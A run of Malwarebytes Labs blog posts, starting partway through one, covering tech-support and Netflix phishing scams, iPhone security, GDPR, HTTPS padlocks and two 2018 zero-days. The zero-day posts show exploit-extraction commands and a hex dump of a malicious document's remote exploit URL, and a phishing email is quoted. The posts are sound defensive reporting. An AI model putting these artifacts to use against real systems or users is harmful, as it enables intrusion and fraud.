Viewers should come away with a greater understanding of the types of advertising used in the systems they engage with on a daily basis, how that advertising may target family members in specific ways, which types of gaming are least/most susceptible to advergaming, how game developers manipulate gamers into seeing ads at specific times, and the informed choices available to reduce or eliminate forms of in-game ads they may feel uncomfortable with.

I’d like to think I got the job done for the attendees of Virus Bulletin 2017, shining as big a light as I could on some of these practices in the 25 minutes available to me. You can read the full paper about the Virtual Worlds of Advergaming here.

Otherwise, you can simply watch the talk (with a few minutes of the opening missing due to a technical hitch) below.

The post Exploring the virtual worlds of advergaming appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fake Malwarebytes helpline scammer caught in the act

Malwarebytes - Thu, 05/17/2018 - 15:00

An estimated one in every 10 American adults lost money in a cyber scam in the past 12 months, according to a report released by the FTC earlier in the month. On average, each scam victim lost $430, totaling about $9.5 billion overall.

To put this in perspective, that’s over 22 million Americans scammed for $26 million a day, more than $1 million an hour, $18,000 per second.

No one is immune, and now more than ever there is a need to be vigilant. Being taken by a scam can ruin lives or damage the reputation of legitimate companies. No one is excluded—not Amazon, Dell, Malwarebytes, or you.

In the example below, we’ll show how scammers Blue Eye Ventures, LCC, tried to imitate Malwarebytes in order to trick people out of money. Now, more than ever, it’s important to be vigilant in order to tell the good guys from the bad.

Malwarebytes helpline scam

Using a modern web design aesthetic, Blue Eye Ventures makes a reasonably good impression of a company looking to help its clients. They advertise that they are a Malwarebytes helpline. But they are not.

In order to catch these guys in the act, I called the toll-free number asking for help, telling them I wasn’t sure my Malwarebytes software was working properly. I allowed the technician to have access to my computer. He opened up my Malwarebytes software.

I’m sorry sir, this is fake software

The technician on the phone advised me that the (legitimate) Malwarebytes software I was running was fake. Now, I knew that it was not fake. I ran it minutes earlier and it worked perfectly.

Next thing I knew, he ran a tree command. Tree is a recursive directory listing program that produces a depth-indented listing of files. This is not a diagnose tool.

These are the results he produced:

At the bottom of the tree command, he typed “Security Breach” to scare me into believing that my computer was being hacked.

More scare tactics

He then checked my System Configuration:

The tech told me that all my software wasn’t running. “It’s stopped.” This was to scare me into believing that my system wasn’t working. Again, he wasn’t using any tools to diagnose hacking or infections.

He then pulled up Resource Monitor:

The tech asked me, “Do you know what crss.exe means?” I told him I don’t, even though I do.

The csrss.exe file located in C:\Windows\System32 is a real file, and removing it will cause problems with your PC. If someone tells you it’s a virus, that’s a hoax.

Case in point, to further scare me into believing my computer was infected, the tech asked me to read the description he pulled up on Google about the csrss.exe file being a Trojan horse or virus.

The Google result pulls information from an unreliable and untrustworthy source. For example, the article linked here recommends users remove this “malware” from their Mac systems. Any file with .exe is a Windows executable.

Meanwhile, the scammer still hadn’t checked my system with any real tools to find problems. He was only there to scare me into purchasing his plans.

Do not purchase

Below are the plans he offered me, from one year of support for $200 to a lifetime plan for $700. I was instructed to pay Blue Eye Ventures, LLC, by check. Or I could use my credit card at Easy-installatio.com (phone number +120-3354649). This is a Canadian number—and Malwarebytes’ HQ is in the United States.

How do you think a real customer would feel? They purchased Malwarebytes and now they are being told that they purchased phony software, their computer is infected, and it’s going cost them hundreds of dollars to repair. Scammers are not only ruining the reputation of legitimate companies, but they are ripping customers off in the process.

At Malwarebytes, we are always working to expose fraud and educate consumers. We will never sell phony software. We will never charge you hundreds of dollars to fix your computer. And we will teach you how to spot the companies who do.

The post Fake Malwarebytes helpline scammer caught in the act appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Seven security tips for staying safe on an iPhone

Malwarebytes - Wed, 05/16/2018 - 15:00

iPhones have a reputation for being notoriously secure. After all, they caused quite the kerfuffle between Apple and the FBI because they are, from the FBI’s point of view, too secure! However, don’t let that lull you into a false sense of security. Using an iPhone is not an automatic guarantee of invulnerability.

The good news is that there are easy things to do to avoid causing problems for yourself. The following seven tips will help you to make sure your iPhone is the digital fortress that it was meant to be.

1. Use a long passphrase

Most people set a four-digit PIN code, or perhaps the slightly more secure six-digit PIN, to secure their phones. And sure, this seems like perfectly acceptable protection, given that the phone will lock itself down for increasing amounts of time if a thief tries to unlock it with the wrong code too many times. Depending on your settings, it may erase itself after 10 incorrect tries.

What can possibly go wrong? Out of a possible 10,000 combinations, the attacker has to guess correctly in the first 10 attempts. The chances of doing that are quite low—one in 1,000, to be precise. Using six digits increases your odds further.

However, not all attacks involve poking numbers into the screen repeatedly. There have been many devices over the years capable of retrying PIN numbers endlessly, with no penalties, by taking advantage of vulnerabilities in the hardware or software of the iPhone. The latest of these, the GrayKey device, can crack a four-digit PIN in an hour or two, and a six-digit PIN in three days or less.

If there’s one universal truth about these passcodes, it’s that longer is better. The best thing you can do is start using a longer alphanumeric password instead of a PIN code. Each additional character of length increases the time needed exponentially, and that time gets even longer when adding letters and symbols to the mix.

To change to a longer password, open the Settings app, then tap Touch ID & Passcode. Enter your current PIN, then tap Change Passcode on the next screen. Enter your passcode again, but then instead of entering a new passcode, tap Passcode Options. This will give you the option to choose, among other things, a custom alphanumeric code.

I know what you’re thinking. Who wants to enter a lengthy password every time they unlock their phone? Fortunately, modern iPhones have convenient biometric options for accessing the device without entering the password every time. Either Touch ID or Face ID gets you into your phone fast, without needing to enter the password.

Of course, Touch ID and Face ID are convenience features, not security features. There are valid concerns about the safety of using a biometric pattern that cannot be changed as a replacement for a password. Still, if they allow you to use a longer password conveniently, that’s worth way more than avoiding them but using a short PIN code. You can always temporarily lock the device so that Touch ID and Face ID won’t work. For more information, see Apple’s information on the security of Touch ID and Face ID.

2. Lock down your Apple ID with 2FA

With what, now? That funny abbreviation (2FA) stands for two-factor authentication, a means of authentication that requires not just something you know, like a password, but also something you have, like a temporary, one-time-only code. Without both, an attacker cannot access your account.

Your Apple ID provides the keys to the kingdom. It’s tied to every device you own. It probably has a credit card associated with it. Your Apple ID is also your iCloud account, and as such it may hold all manner of tempting goodies, including passwords.

Fortunately, Apple offers 2FA on your Apple ID, and it’s strongly recommended that you take advantage of this. Doing so means that you will always have to enter both your password and a six-digit code sent to a trusted device before logging on to your account from a new machine. This makes it very difficult for a hacker to access your Apple ID and the trove of data it can give access to.

3. Keep your iPhone up-to-date

Keeping your system and all your apps up-to-date is an important part of staying secure. iOS (the system that runs on iPhones) updates frequently to fix vulnerabilities that could be used in various scenarios to attack your device. Some of these are minor, others are major issues.

As an example, consider the GrayKey device discussed above. The method it uses to break into iPhones is still unknown, but one thing is for sure: It relies on one or more unknown security vulnerabilities in iOS. At some point, Apple will find and fix those vulnerabilities, making you safe from GrayKey or any other groups or individuals who may have discovered the vulnerabilities. If you don’t install iOS updates promptly when they are available, though, you remain vulnerable.

Worse, once a vulnerability is patched and Apple publishes their release notes, that gives hackers a little extra information that may help them find the vulnerability, meaning older systems are potentially in greater danger after that point.

4. Use a VPN on free Wi-Fi

Public Wi-Fi can be extremely hazardous. Anyone else on the same network can see any unencrypted network transmissions you make, and an untrustworthy network can actually perform all manner of man-in-the-middle attacks for phishing or other malicious purposes. For example, if you try to log onto your bank site on public Wi-Fi, you might not actually be logging onto your bank site. It could be a malicious look-alike site that bad actors within the Wi-Fi network are sending you to instead.

You could always use cellular data when in public, turning off Wi-Fi in settings, but that’s not always practical, especially with the data caps on most cell data plans. Fortunately, there’s a good solution: a VPN, or virtual private network. Using a good VPN means that all your network traffic is tunneled through an encrypted connection to a server located somewhere else.

Unfortunately, there are a lot of insecure or untrustworthy VPNs out there. It doesn’t help your security much if the VPN is careless with your data, or is otherwise not acting in your best interests. There are many free VPNs out there, but remember the first rule of free services on the Internet: If you’re not paying for it, you’re the product.

Finding a trustworthy, secure VPN can take a little work. Fortunately, an excellent article by Brian Krebs provides details about VPNs and how to select a good one. Make sure that the VPN you choose has good support for iOS; anything that requires you to download an app, but doesn’t offer an iOS app, is off the table from the start.

5. Use additional encryption

The encryption on the iPhone is one of its finest features, but it’s not perfect. As long as there’s any chance of cracking your iPhone’s passcode, or gaining access to unencrypted backups, your data isn’t safe. For your particularly sensitive data, such as passwords, social security numbers, credit card numbers and the like, you need additional encryption.

Using a password manager with its own strong encryption, and a strong password different from any other password you use, can be extremely helpful. A utility like 1Password can store a vault in iCloud that is encrypted independently, meaning an attacker looking for your passwords would need to first crack your phone or iCloud account to access the vault, then crack the vault itself.

Similarly, Apple’s own Notes app now allows creation of encrypted notes, which can be secured with a password of your choice. Use of a strong, unique password means that the data such a note contains is also quite secure.

When it comes to your iPhone backups, consider backing up to your computer using iTunes, and set iTunes to encrypt those backups. Such encryption will use a separate password that you set, so be sure to use a strong, unique password for that.

6. Audit privacy settings periodically

There are many permissions that can be granted to apps, such as access to the camera, the microphone, your contacts, and your location. It’s a good idea to keep track of which permissions you’ve given to which apps, and to revoke any permissions that are not strictly needed. For example, if you posted a photo to Twitter once, but you aren’t likely to do it again, it would be a good idea to remove the right to look at your photos from the Twitter app.

In Settings, tap on Privacy. Here resides the master list of all permissions and which apps you’ve granted them to. Go through all of them periodically, and revoke any permissions that you don’t think a particular app needs.

7. Beware of scams

Use of an iPhone doesn’t do a thing to protect you against scam phone calls or scam text messages. Always be wary of calls or messages from unknown senders. Treat any links received in text messages with extreme suspicion, even if it’s from someone you know, since the sender could be spoofed or their phone could have been stolen.

If you tap a link in a message and the site wants you to log in or provide other personal information, verify with the sender that it’s legitimate. If it appears to be a site you’re familiar with, consider visiting the site via a bookmark instead of the link.

You can also consider using security software that can screen and block scam calls and texts, such as Malwarebytes for iOS (coming soon).

The most secure phone

It’s okay to feel safe as an iPhone owner. Currently, iPhones are the safest smartphones on the planet. However, as demonstrated here, there are still plenty of ways that you can become a victim. So don’t just assume you’re safe automatically by virtue of owning an iPhone.

Doing the right things to keep yourself safe can often be more important than having the most secure phone.

The post Seven security tips for staying safe on an iPhone appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Adobe Reader zero-day discovered alongside Windows vulnerability

Malwarebytes - Tue, 05/15/2018 - 18:44

During the first half of 2018, we have witnessed some particularly interesting zero-day exploits, including one for Flash (CVE-2018-4878) and more recently for Internet Explorer (CVE-2018-8174). The former was quickly used by exploit kits such as Magnitude, while it is only a matter of time before we see the latter being weaponized more widely.

We can now add to that list an Adobe Reader zero-day (CVE-2018-4990), which was reported by ESET and Microsoft and has already been patched. Although it has not been observed in the wild yet, it remains a dangerous threat considering it is coupled with a privilege escalation vulnerability in Microsoft Windows.

To exploit the Windows vulnerability, the attacker must write to an arbitrary address in kernel space, which will not work for Windows 8 and above, as newer security features prevent this kind of mapping. Those two combined zero-days were necessary to escape the Acrobat Reader sandbox protection, which to its credit has been improving the security of the software drastically, so much so that malicious PDFs that were once common as part of drive-by download attacks have all but vanished.

Let’s take a quick look at the malicious PDF using pdf-parser:

python pdf-parser.py --content CVE-2018-4990.pdf

We can see a suspicious obfuscated blurb that most likely contains the JavaScript code we are looking for. We can decode and dump the output to a raw file:

python pdf-parser.py -c CVE-2018-4990.pdf --object 1 --filter --raw > output.raw

The exploit code is now visible in clear text. For a good explanation on how it is used for the ROP chain and shellcode execution, please refer to the ESET article.

We tested this zero-day against Malwarebytes, which was already stopping it without the need for any additional updates. The mitigation happens at the very beginning of the exploitation chain (stack pivoting):

We recommend users patch their systems to prevent this threat, which will most likely be weaponized in the wild soon. A very plausible attack scenario would be a PDF attachment in a malspam campaign.

The Adobe security bulletin (CVE-2018-4990) can be found here, while Microsoft’s (CVE-2018-8120) is here.

The post Adobe Reader zero-day discovered alongside Windows vulnerability appeared first on Malwarebytes Labs.

Categories: Techie Feeds

GDPR causes a flood of new policies

Malwarebytes - Tue, 05/15/2018 - 18:25

The European Union claims that the General Data Protection Regulation (GDPR), which comes to term on May 25, is the most important change in data privacy regulation in 20 years. Many companies have spent months preparing for the changes, working on policy and compliance, and introducing changes to their products in order to meet new standards.

We have received quite a few alerts and emails about those policy changes from a wide variety of companies. Combing through the alerts allowed us to see some interesting methods to solve—or evade—the problems that come with making businesses compliant. Let’s take a look at how different companies are coping with GDPR changes, and what you’ll need to pay attention to in those emails.

Total evasion

For some companies whose business interests are too slim in Europe, giving up seemed like the best option. File this alert from Unroll.Me, an app to unsubscribe from unwanted mailing lists, under “why bother.”

because our service was not designed to comply with all GDPR requirements, Unroll.Me will not be available to EU residents…. And we must delete any EU user accounts by May 24.

Obviously, there is a reason for such drastic measures, and I would call it a good guess if someone were to suggest that this might be related to Unroll.Me having been found selling email data to Uber.

Unroll.me may not be the only company walking away from its European customers in the face of GDPR. Some services have popped up seeming to help companies stay compliant by blocking EU visitors to websites. The GDPR shield shown below was promoted for a period as a possible solution, but the site seems to be down now. Or I could not reach it because I’m in the EU, and the block works too well.

 

Keep EU visitors off your site by using a GDPR Shield

Chain responsibility for advertisers

Some sites and platforms have advertising partners with whom they share user data. GDPR states that So, you would hope that they take special care in selecting partners who will handle that shared data. Instagram and other Facebook companies have decided on a different approach, shifting that portion of the responsibilities to their advertisers:

Businesses who advertise with Instagram and the Facebook companies can continue to use our platforms and solutions in the same way they do today. Each company is responsible for ensuring their own compliance with the GDPR, just as they are responsible for compliance with the laws that apply to them today.

Helping B2B customers

Google Cloud, on the other hand, offers to help their customers.

You can count on the fact that Google is committed to GDPR compliance across Google Cloud services. We are also committed to helping our customers with their GDPR compliance journey…

What deserves your attention

Under the GDPR rules, companies need explicit and informed consent from their customers to collect and use their data, so you can expect, and probably have already have seen, a lot of policy changes (Terms of Service). As much as you might be tempted to automatically delete the influx of emails from online providers, it’s important to pay attention to those new privacy policy regulations—especially if it appears that the company may be cutting corners in meeting GDPR standards.

When sifting through these emails, I’ve come across some that I would not count as informed consent. A banner that looks and behaves like a cookie warning does not qualify, and neither does providing a less-than comprehensive picture by spreading out information across several different web pages. I’m hoping that these platforms will provide more detailed and specific information before the magic GDPR drop date arrives.

To juxtapose these flimsy attempts at GDPR compliance, Google has done an excellent job informing its users of changes. Its Privacy Policy has been updated to make the content easier to understand in light of the GDPR demand that users be able to make informed decisions. It has updated the language and navigation of the document, and introduced videos and illustrations in order to make things clear.

Some companies that are active worldwide do make a distinction between EU and non-EU customers, but offer the same functionality that is automatically applied to EU-based IP addresses as an option to users outside of the EU.

When a user is in Privacy Mode, we will not collect or process any personal data, as defined by GDPR. In cases where we do not have a lawful basis for processing personal data we will apply Privacy Mode to requests from IP addresses associated with an EU country.

Other, smaller, companies made an effort to send out more personalized notifications letting me know I needed to approve their new policy in order to stay in touch:

While the ongoing influx might be a nuisance in your inbox, this is a great opportunity to review the privacy policies and maybe say goodbye to some of the companies that have your email address. (Although the professional spammers will probably just keep on going as if nothing has changed.)

 

Where will GDPR lead us?

Looking at the examples we have seen so far, we can divide the big players from the small players and see that some small players from outside the EU are giving up that part of the market—at least for the time being. The big players and European companies are mostly applying the same policies for EU and non-EU customers, although there will always be some exceptions.

Some have predicted there will be two separate Internets as a result of GDPR. I don’t think that will happen. But we will soon get a better idea of how things will play out once the implementation is done and the first shots across the bow have been fired.

In the meantime, it is worth your time to review the changed policies carefully and pay close attention to privacy policies when you sign up for something new.

And in case you were wondering about ours, feel free to review the Malwarebytes Privacy Policy.

The post GDPR causes a flood of new policies appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 7 – May 13)

Malwarebytes - Mon, 05/14/2018 - 17:18

Last week on Labs, we looked at the case of a fake Android AV, an annoying adware that goes by the name of Kuik, the return of threat actors behind the Shopper Stop tech scam, a new Netflix phishing scam, the recent zero-day vulnerability in Internet Explorer, and the insufficiency of merely relying on the presence of the green padlock. Also, in a brief blog post, we talked about why we removed the blacklist of tech support scammers we have been dutifully maintaining for years.

Other news

Stay safe, everyone!

The post A week in security (May 7 – May 13) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Where did the tech support scam blacklist go?

Malwarebytes - Fri, 05/11/2018 - 15:00

For about five years, we’ve maintained a blacklist of recognized tech support scammers, along with websites and phone numbers they might use to contact victims. The blacklist was part of our Tech support scams: help and resource page, which tells readers how scams work, what tricks to look out for, how to get help after you’ve been scammed, and who to contact to report the scam.

The blacklist was started long before the scale of tech support scamming was understood, and very quickly became unwieldy, hard to search, and, in many cases, outdated. Given the ease with which scammers can stand up low cost infrastructure and switch VOIP numbers on the fly, we decided that a static blacklist is not the best way to share information with other researchers and interested users.

What we’re doing instead

On the Malwarebytes forums, we now have a “Report a Scam” section. (You must be logged in to view it.) After logging in, post any scam number you encounter, along with the URL of the company, if you have it. Posting in the forums makes it much more likely that a researcher will see it and block the scam ASAP.

What if you haven’t been scammed, but still want to help?  How do you find scammers to report?

Digging up fake tech support

Loading a typo squat for a large, popular website can be a good starting point to find a browser locker (which leads to a tech support scam). But varying user agents and locations can deliver actual malware instead of a locker, so use this method at your own risk.

It’s a bit safer to start with social media, where scammers spam links for their fake companies. Searching Twitter for “Malwarebytes Support” yields a few tweets like the following:

More competent scammers will make use of link shortening services so as to not expose their infrastructure to potential takedown requests. We chose an amateur example for simplicity. (Twitter declined to take down the account when we asked.)

Clicking through yields a convincing scam site:

Now that we’ve got a scam URL and phone number, we can stop there and make a report. Or we can take a look at the website metadata and see if the scammer decided to set up a few alternate sites.

Throwing the latest IP into Passivetotal’s query tool yields a whopping 1,029 domains, including historical hits that are no longer active. Most look to be part of an SEO operation, which makes sense because tech support scammers generally hire third-party SEO services to get their sites in front of victims.

Moving to Hurricane Electric, who provides a free pDNS tool without any historical data, yields the following:

Right away we can see two probable candidates for additional scams. Sifting through pDNS can often improve your scam hunting results, as well as help attribute multiple scams to the same threat actor group. Be sure to actually load the sites to confirm scamming, as legitimate tech companies overseas can sometimes exhibit design cues and domain names similar to fake tech support.

Scam hunting is fun and fairly straightforward. But we can’t be everywhere, and tech support scammers excel at setting up infrastructure with bargain hosting companies quickly. So why not help us get better, and report a scam in our forums? Happy hunting—and stay safe.

The post Where did the tech support scam blacklist go? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Internet Explorer zero-day: browser is once again under attack

Malwarebytes - Thu, 05/10/2018 - 19:58

In late April, two security companies (Qihoo360 and Kaspersky) independently discovered a zero-day for Internet Explorer (CVE-2018-8174), which was used in targeted attacks for espionage purposes. This marks two years since a zero-day has been found (CVE-2016-0189 being the latest one) in the browser that won’t die, despite efforts from Microsoft to move on to the more modern Edge.

The vulnerability exists in the VBScript engine and how it handles memory objects. It will also affect IE11 on Windows 10, even though VBScript is no longer supported by using the compatibility tag for IE10.

The attack came via a Word document making use of OLE autolink objects to retrieve the exploit and shellcode from a remote server. However, it is important to note that it could very well have been executed by visiting a website instead.

Perhaps one of the reasons why it was not used as a drive-by download attack may be because Internet Explorer is no longer the default browser for most people, and  therefore the exploitation would never occur. However, by tricking their victims to open an Office document, the attackers can force Internet Explorer to load, thanks in part to the URL moniker “feature.”

Using rtfdump.py, we see the call for an HTTP connection:

python rtfdump.py -s 320 -H CVE-2018-8174.rtf

000014C0: 70 B2 86 8C 53 30 05 43 00 38 30 01 18 68 00 74 p���S0.C.80..h.t 000014D0: 00 74 00 70 00 3A 00 2F 00 2F 00 61 00 75 00 74 .t.p.:././.a.u.t 000014E0: 00 6F 00 73 00 6F 00 75 00 6E 00 64 00 63 00 68 .o.s.o.u.n.d.c.h 000014F0: 00 65 00 63 00 6B 00 65 00 72 00 73 00 2E 00 63 .e.c.k.e.r.s...c 00001500: 00 6F 00 6D 00 2F 00 73 00 32 00 2F 00 73 00 65 .o.m./.s.2./.s.e 00001510: 00 61 00 72 00 63 00 68 00 2E 00 70 00 68 00 70 .a.r.c.h...p.h.p 00001520: 00 3F 00 77 00 68 00 6F 00 3D 00 37 00 00 00 00 .?.w.h.o.=.7....

This remote request will download a VBS script. A Proof of Concept adapted from the blog that was published by Kaspersky can be seen below:

The flaw abused by this vulnerability relates to a reference count that is checked at the beginning of the function but not after, despite the chance of it being incremented along the way. This allows an attacker to execute malicious shellcode and eventually load the malware binary of his choice.

We tested this Use After Free (UAF) vulnerability with the publicly available PoC running Internet Explorer 11 under Windows 10. The browser crashes once it loads the VBS code, but with Malwarebytes, the attack vector is mitigated:

Microsoft has released a patch for this vulnerability, and we strongly advise to apply it, as it is just a matter of time before other threat actors start leveraging this new opportunity in spam or exploit kit campaigns.

We will update this blog if we obtain more information about this vulnerability being used widely, and in particular, if a full working exploit is available.

The post Internet Explorer zero-day: browser is once again under attack appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Parenting in the Digital World: a review

Malwarebytes - Thu, 05/10/2018 - 15:00

Before I became a new mum not so long ago, I did the best I could to prepare myself to take care of my little one by reading a lot books. From learning how to discern (possible) meanings behind baby’s various cries to finding out what you can and can’t feed your baby once they begin eating solids. It was tough, and I know it’ll get easier in some aspects and more difficult in others as the baby grows up. Truth is, I’m pretty much looking forward to giving “the Cyber Talk” to my little one. And “the Tech Talk.” And “the Privacy talk.” Hey, we have to start them young, right?

At the moment, my nipper is too young to care about anything beyond Hey Duggee, so I can only imagine what parenting is like for those who have a child old enough to use a mobile device. Would they set their phone up to limit the child from opening its browser or tell them to not click buttons when certain pop-ups appear in the middle of a game?

To my dismay, Parenting in a Digital World paints the picture that many parents don’t do a great job dealing with kids and technology—especially when it comes to online safety.

While more and more parents are handing over phones to younger and younger kids, I’m surprised that majority of parents don’t put filtering or any sort of control on these devices, forgetting that their kids can be exposed to potential risks and not knowing how to deal with them. Not only that, “accidentally” losing thousands of dollars to micro-transactions can and actually does happen to parents who don’t supervise their kids online.

Parenting in the Digital World: A Step-by-Step Guide to Internet Safety is a brilliant go-to guide for parents and guardians on how to create an online environment safe enough for their little ones to traverse. In its revised second edition, Clayton Cranford, the book’s author, touched on themes that include social media safety, the importance of privacy, managing an online reputation, and creating balance in a child’s technological life.

Read: Creating a better Internet starts now

Cranford is a leading and award-winning law enforcement professional based in California. For 20 years, he has been teaching about social media and child safety to kids and parents, and threat assessment investigation to law enforcement agencies everywhere in the United States. He has also handled numerous threat assessment cases across about 200 schools in his state.

If you’re the mum or dad who is busy with work or taking care of the second newborn and feeling overwhelmed with the thought of trying to learn about these technologies, Cranford wrote Parenting in the Digital World just for you. In less than 100 pages, you’ll get to know famous apps children use, ways to set up parenting controls for different OSes and gaming consoles, relevant security and privacy topics for conversations with your kids, and setting rules and expectations in the home about proper technology use.

I can name some things I love about Parenting in the Digital World. In the first half of the book, Cranford tells parents and guardians about the different types of social media, what are the problems with the platform, and when is an age-appropriate time for your kids to have profiles themselves. These sections also contain action plans that grown-ups can use to, say, make sure that the settings of their child’s social media profile are appropriately configured for privacy.

Cranford also sheds light on topics beyond security and privacy that parents can talk to their kids about, such as depression, body image, the consequences of making physical threats online, and even pornography. I was also quite intrigued by the Internet & Mobile Device Usage Contract, which parents can use to foster responsibility for the devices their children use and accountability for what they post online. It’s been a while since I’ve seen something similar, and I’ve always been interested in knowing how useful a working contract would be between parent and child.

The second half of the book contains detailed instructions and illustrations about all things parents may want to configure, from parental controls for the Xbox One to YouTube Safe Search and Apple iMessage Privacy.

While I wouldn’t say “no’ to having this book in my personal library, I felt it should have covered other social media risks kids and teens might encounter, such as bad bots (spammers) and trolls, and perhaps a sub-section on how to recognize compromised or fake accounts. I also think it would be helpful for both kids and parents to be given pointers on how they can discern dodgy apps from legitimate ones.

Read: When trolls come in a three-piece suit

Parenting in the Digital World: A Step-by-Step Guide to Internet Safety is as comprehensive and relevant as it was since its first publication three years ago. Cranford was right: As much as there are new devices, software, and websites, the sad reality is there are just some things—bad things—that remain the same. Online sexual exploitation, cyberbullying, and harassment cannot be fought off if we don’t do something about it. Thankfully, parents and guardians can take action. After all, learning about Internet safety and securing a child’s online environment begins in the home, too.

Other related posts:

You may also want to check our other book reviews:

The post Parenting in the Digital World: a review appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Netflix phish claims your membership is on hold

Malwarebytes - Wed, 05/09/2018 - 17:00

The days of ugly-looking phish pages hosted on something akin to a Geocities page are slowly receding into the distance. For quite some time now, phish attacks have made attempts to look fairly sophisticated and stand a decent chance of fooling anyone not keeping their guard up.

Today, we have a good example of this with a Netflix phish currently in circulation and (potentially) dropping into a mailbox near you. Netflix is a frequent target of all manner of scams, and is a popular go-to for phishers.

Here’s the email that kickstarts the process:

Your Netflix Membership is on hold [#46537]

We recently failed to validate your payment information we hold on record for your account,
therefore we need to ask you to complete a brief validation process in order to verify your billing and payment details.

Click here to verify your account

Failure to complete the validation process will result in a suspension of your netflix membership.

We take every step needed to automatically validate our users, unfortunately in this case we were unable to verify your details.

This process will only take a couple of minutes
and will allow us to maintain our high standard of account security.Netflix Support Team

This message was mailed automatically by Netflix during routine security checks. We are not completely satisfied with your account information and required you to update your account to continue using our services uniterrupted.

Click to enlarge

Apart from the clunky typo in the small print, this is a fairly convincing email scam, combining someone who knows how to make an email not look terrible with the imminent threat of losing access. Having said that, you’ll notice the mail system above flagged it as suspicious anyway. This isn’t the case for all email clients, however, and one shouldn’t assume nothing slips through the cracks. The destination site, located at login(dot)netflix-activate(dot)com, appropriates a standard, no-frills Netflix login screen.

Click toeEnlarge

You’ll also notice the site makes use of HTTPS in an effort to look more convincing, via a free cert from Let’s Encrypt.

If the days of ugly phish pages are on the wane, so too are the days of advising people to look for HTTPS when working out if a site is trustworthy or not. For comparison, here’s what you see in the address bar for the real Netflix:

That’s really nothing you can base a “this is the real site” judgement on; all you can really do here is say that all communications on both sites are securely encrypted. But that doesn’t mean you’re securely communicating with the right people. You can, of course, click into the padlock area and see more information about the certificate issued, but for most people, that won’t help them make a decision one way or the other.

Many organisations make use of Extended Validation certificates, which display your name in the padlock area in return for additional auditing to make sure you’re who you claim to be. Visit Paypal’s website if you want to see an example of this. There is some criticism of these certs, but in general it’s a useful visual aid.

Anyway, onto the phish itself, which consists of a grab for personal information including name, address, phone number, and date of birth:

Click to enlarge

After that, they try and swipe payment information, asking for the name as written on the card, card number, expiry date, security code, and even a cheap grab at a security question answer for good measure.

Click to enlarge

Once everything has been entered into the site, the scammer presents the victim with a splash page claiming everything is now up to date:

Click to enlarge

It reads as follows:

Your account has been updated.

Thank you for updating and confirming your account information. You may now continue to login and use your account as normal without further interruptions.

After this, there’s nothing left for the scammer to do except gently coax the now phished website visitor to click the button and be directed to the real Netflix website. They’ll likely be blissfully unaware anything is untoward until the scammers try to make fraudulent transactions on their card.

These emails follow a similar format as the Apple phishes in February, and indeed quite a few others going around at the moment (also Apple-centric, so constant service-related vigilance is the order of the day). Phishing emails won’t be going away anytime soon, and the people behind them keep striving to make their fake-outs ever more believable. It’s up to us to do what we can, and consign their sneaky missives to the recycle bin. Your bank account will thank you for it.

The post Netflix phish claims your membership is on hold appeared first on Malwarebytes Labs.

Categories: Techie Feeds

HTTPS: why the green padlock is not enough

Malwarebytes - Wed, 05/09/2018 - 16:30

When goods get sold in large quantities, the price goes down. This might not be the first law of economics, but it’s applicable. An extrapolation of this is that if there are practically no production costs and no raw materials involved, prices of such goods will drop to zero. Usually, they will be offered as free gifts to promote the sale of other, more costly goods.

Something like this has happened to SSL certificates. They are offered for free with web hosting packages by several companies, including those that don’t do a thorough check into the identity of the buyer. Better said: They couldn’t care less who buys the package as long as they pay the bills.

So, while users can now expect to see the green padlock on every site, especially the ones where they make financial transactions, the trust that we can put into the underlying certificates is going down.

Definitions

To clarify what we are talking about, let’s have a look at the definitions of the protocols we are about to discuss.

Hypertext Transfer Protocol Secure (HTTPS) is a variant of the standard web transfer protocol (HTTP) that adds a layer of security on the data in transit through a secure socket layer (SSL) or transport layer security (TLS) protocol connection.

Secure Sockets Layer (SSL) is a computer networking protocol for securing connections between network application clients and servers over an insecure network, such as the Internet.

Transport Layer Security (TLS) replaced SSL when it was deprecated, but TLS is backwards-compatible with SSL 3.0.

So, basically TLS is a computer networking protocol that provides privacy and data integrity between two communicating applications. It’s used for web browsers and other applications that require data to be securely exchanged over a network.

The green padlock

So, where does the green padlock come into play? The green padlock simply means that traffic to and from the website is encrypted. A certificate, provided by a certificate provider (Certificate Authority or CA), is used to set up this encryption. Sounds good, right? But the only thing you can actually be sure of when you see such a padlock is that your computer is connected to the site that you see in the address bar.

Let’s use the example above to explain some of this. A right-click on the padlock shows us some more information about the secure connection.

So, we have a secure connection to the domain paypal.com owned by PayPal, Inc. and the Certificate Authority is Symantec.

Let us compare this authentic one to the one in use by a known PayPal phishing site:

As you can see, the phishers have a green padlock on their site as well. But when we have a look at the details:

It is easy to see, from the browser address bar alone, that we are not connected to paypal.com. And in the additional information, we can see that the phishers used a free certificate from the CA Let’s Encrypt.

I do realize that in this example it was easy to see the wrong address in the browser’s address bar, but typosquatted domains can be a lot harder to spot, as they purposely use domain names that look similar to the legitimate site. PayPal has registered many such typosquatted domains to protect their customers.

So, we’ve established that the green padlock alone is not enough. In fact, over a million new phishing sites surface every month. Given how many new sites—not just phishing sites—are created every day, and knowing that hosting deals include free certificates and are cheap as dirt, we can easily assume that hosting providers do not have the resources to check each and every new site. Even if they did perform these checks, who is going to check whether the site does not get changed once it has gone live?

So, since the visitor is the one facing the consequences of entering his credentials on a phishing site, it looks like the ball is in his court.

But there is help

You do not need to feel helpless. The cavalry comes to the rescue in many shapes and forms. Some browsers warn you before they let you visit known phishing or other malicious sites. This method is based on blacklisting, so if you are among the first visitors, you could still wind up on such a site without a warning.

Some security software, including Malwarebytes, blocks known phishing and other malicious sites. These methods can be based both on blacklisting and behavioral analysis.

And there are certificates that do get issued only after extended checks. These are called EV (Extended Validation) certificates. To show the difference, we need to double back a bit.

The bottom screenshot is the original PayPal certificate, and it is an extended one. The top screenshot is a regular Domain Validation (DV) certificate (which was used by the phishing site). As you may notice, the EV certificates are displayed differently from the DV certificates. The difference in how they are displayed varies per browser, so you might want to familiarize yourself with the way that these are displayed in your browser of choice.

Check, check, triple-check

Since HTTPS and TLS are becoming commonplace and cheap, phishers are no longer barred in any way from using the green padlocks on their deceptive sites. As a consequence, users are under advise to pay attention to the kind of certificate behind the padlock.

